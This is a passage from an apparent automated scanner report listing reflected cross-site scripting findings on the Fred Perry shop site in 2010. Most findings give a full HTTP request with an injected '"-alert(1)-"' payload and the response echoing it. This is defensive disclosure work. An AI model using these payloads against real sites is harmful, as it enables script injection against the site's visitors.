<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags1e542"-alert(1)-"ab556611c86/");
//]]>
...[SNIP]...

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 672ee"-alert(1)-"71633396054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/?672ee"-alert(1)-"71633396054=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vprn28dhlohctf81ipm71lhos2; expires=Tue, 09-Nov-2010 17:21:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Bags -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/?672ee"-alert(1)-"71633396054=1");
//]]>
...[SNIP]...

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11130"-alert(1)-"1f093ec014e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags11130"-alert(1)-"1f093ec014e/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eu32c8hn6p6l6pl7shl718a3s1; expires=Tue, 09-Nov-2010 17:21:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags11130"-alert(1)-"1f093ec014e/men/");
//]]>
...[SNIP]...

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 700bd"-alert(1)-"638b67561b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men700bd"-alert(1)-"638b67561b1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2dpnq9s6uhordu2ekaag73oqd1; expires=Tue, 09-Nov-2010 17:22:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men700bd"-alert(1)-"638b67561b1/");
//]]>
...[SNIP]...

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc8a"-alert(1)-"a9caf531ee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=987e9hdtksal28qktsq7m48l10; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's B
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1");
//]]>
...[SNIP]...

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04a"-alert(1)-"172e220982f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags6f04a"-alert(1)-"172e220982f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=94un9ikch5osarj2upkkdtsjg7; expires=Tue, 09-Nov-2010 17:22:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags6f04a"-alert(1)-"172e220982f/women/");
//]]>
...[SNIP]...

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fabc8"-alert(1)-"0f5859d0a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/womenfabc8"-alert(1)-"0f5859d0a8d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1vqfpruo2fkaf33lekrligvrs3; expires=Tue, 09-Nov-2010 17:22:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/womenfabc8"-alert(1)-"0f5859d0a8d/");
//]]>
...[SNIP]...

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 711a1"-alert(1)-"4fddbd7dfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dflahktbppu5lbtqraphaglle2; expires=Tue, 09-Nov-2010 17:21:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1");
//]]>
...[SNIP]...

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6533"-alert(1)-"855d4def8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:34:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msbkftrehe2499gnpdc6fhajb3; expires=Tue, 09-Nov-2010 17:34:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/");
//]]>
...[SNIP]...

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5389"-alert(1)-"a8da9f27867 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:36:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7ht57d6h8og3t308gnu6l0nns3; expires=Tue, 09-Nov-2010 17:36:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/");
//]]>
...[SNIP]...

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a148d"-alert(1)-"ab7ff097b6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=miih4kiqs00u95msd9dc70fdt3; expires=Tue, 09-Nov-2010 17:37:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/");
//]]>
...[SNIP]...

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49ade"-alert(1)-"9853f03a934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch49ade"-alert(1)-"9853f03a934/result/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=30se6b9v1g6p0lo6svqgj1vgs1; expires=Tue, 09-Nov-2010 17:22:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch49ade"-alert(1)-"9853f03a934/result/");
//]]>
...[SNIP]...

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d24f"-alert(1)-"1aca295eca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/result1d24f"-alert(1)-"1aca295eca0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bp6840rulj7bcunchiglt11ee3; expires=Tue, 09-Nov-2010 17:22:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/result1d24f"-alert(1)-"1aca295eca0/");
//]]>
...[SNIP]...

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb5f"-alert(1)-"ef4f242604b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout6fb5f"-alert(1)-"ef4f242604b/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vi3g5moh1rl2cjoh82ejcl9rl5; expires=Tue, 09-Nov-2010 17:18:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout6fb5f"-alert(1)-"ef4f242604b/cart/");
//]]>
...[SNIP]...

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f96"-alert(1)-"360bb29e453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/carte3f96"-alert(1)-"360bb29e453/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
